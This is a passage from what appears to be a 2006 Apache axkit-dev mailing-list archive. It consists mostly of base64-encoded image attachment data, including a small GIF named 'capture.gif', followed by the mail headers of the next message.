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 ------=_NextPart_000_001B_01C6A8F4.33E0E10E Content-Type: image/gif; name="capture.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhgABmAMYAAMru+iMrUJexxRccRJWvw4WdtF1ui6vJ2lZlg5+8zsLl8iIqT2p9mMXo9cjr +GN2kk5de4miuDQ+YSkxVsfq96PA0kdUdBogRzU/Ypiyxsnt+X6VrTE6Xllqh6rI2ZGrv3CEniQs UXOIoYiht0NQcD9Lbbra6EJPb4GYsFJhf7DP4KbE1XeMpWt+mSAoTcHk8ScvVLbW5WByjzdCZB4l S2h7lktZeCgwVbLR4YKZsXqRqWx/mh0kSjtHab/h777h7nWKo8Di8DA5Xcjs+FhohiUtUnaLpI2m vH+WrsPm85Cqvml8l4ylu7jZ56K/0bvd60ZTc6/O38Tn9C02Wsbp9r3f7LTU5Cw1WUpYd26CnC84 XD5KbGJ1kbrc6qfF1pq2yYCXr5mzx8Xd68DS4ow9YZligcLY58DR4b3H2ZZYeQAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA AAAAgABmAAAH/oAAgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2u r7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn 6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAMKxBcggAAAAwYQwJRwoaiEBTYZSHggU0OEChlmFIUA QQJNChYkZGAxY4MGDiY9gPARwMmUvyIMkDBgAgWNDitdXFXBwoILGDIM0rCBQ8KEHRD59JDw4KCE H0CECCBCgyCoUqlaxbjwooYRJEQuKGECQM+fQQWdOCqBKwAN/igwXAiQQsVThRE4AF1BiUWJFhYG uHghCMQAGAU+YBiQ1FCMATIAkBiAgFDCGRdoJIxwdQBmzQM4u71Y4zICGzdwAPALWDDhHAlT6HC7 YwAPGWtDqMa4VuSAHpR8CHqRkO8PHgMiArDB+BCQAXxl8vhxF0OMIEIGnOhsHbv2zl0Vqkj4YKuG IQCEAyAOHTz4GBcGoHBplEjnIhk0GBlwoVKMI0gkVAEAAiRk13LNFaIBBzNYlYRIOdylhCCludDZ hABU6F5DsA0QwyH/BTjAgG5xNUJCZQGwxAA3dMaEIB8kRIkO8U0gIAAFJNSEIMw1RogTRwVZwl0O PddfiUZu/qgQCwndVAiNNd1YYkM6JAQTk0fuRICMkjwR30c3KpGQB4JAkSAhBlxgwJoGIJBQFO6p WFOcK06gJAE5DgAnIV4OAOaIcTZ04gAplmZniVsOMMkKCQXhQ0If4TASjkgVIsUCFhAyxBQD7OAe BYvZ5xaoA4h6UUPwDZACFUMxOoCjkAoS34tcpTofFfXFmegkVSDXwwy+WoHgACHQYJQBhTCRXCEt DHBFSglhkYWZNOwZ7bQDVHsnAIYNoEVHHKzQ62/A/ibsFp6RdFFtPHAxmW66cilJBDCEUAAKNARQ URc2XDCDE1gMwEUhWPCg3iBeJPQFRgnxYIEXdzX8MJFulGnAxAmawQCFavTai6++AKwggb8VgzHy Ainsiai8nmiQHRCS7FSIzNUkIUMFDfjQLV+R0EzxNewF6WnMG81cdDVDhMEABFgYsPAkLx0S9UBU V2311VhnrfXWXHft9ddghz2IAmIoQM0YZJRhShlpS4K22p2YkcAZmshNNxppYOiIA0qkjUYZaYTh SBhk6P0I3oZbEggAOw== ------=_NextPart_000_001B_01C6A8F4.33E0E10E-- From [email protected] Mon Jul 31 21:18:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47051 invoked from network); 31 Jul 2006 21:18:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jul 2006 21:18:46 -0000 Received: (qmail 20562 invoked by uid 500); 31 Jul 2006 21:18:46 -0000 Delivered-To: [email protected] Received: (qmail 20545 invoked by uid 500); 31 Jul 2006 21:18:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <axkit-dev.xml.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 20534 invoked by uid 99); 31 Jul 2006 21:18:46 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 31 Jul 2006 14:18:46 -0700 X-ASF-Spam-Status: No, hits=2.6 required=10.0 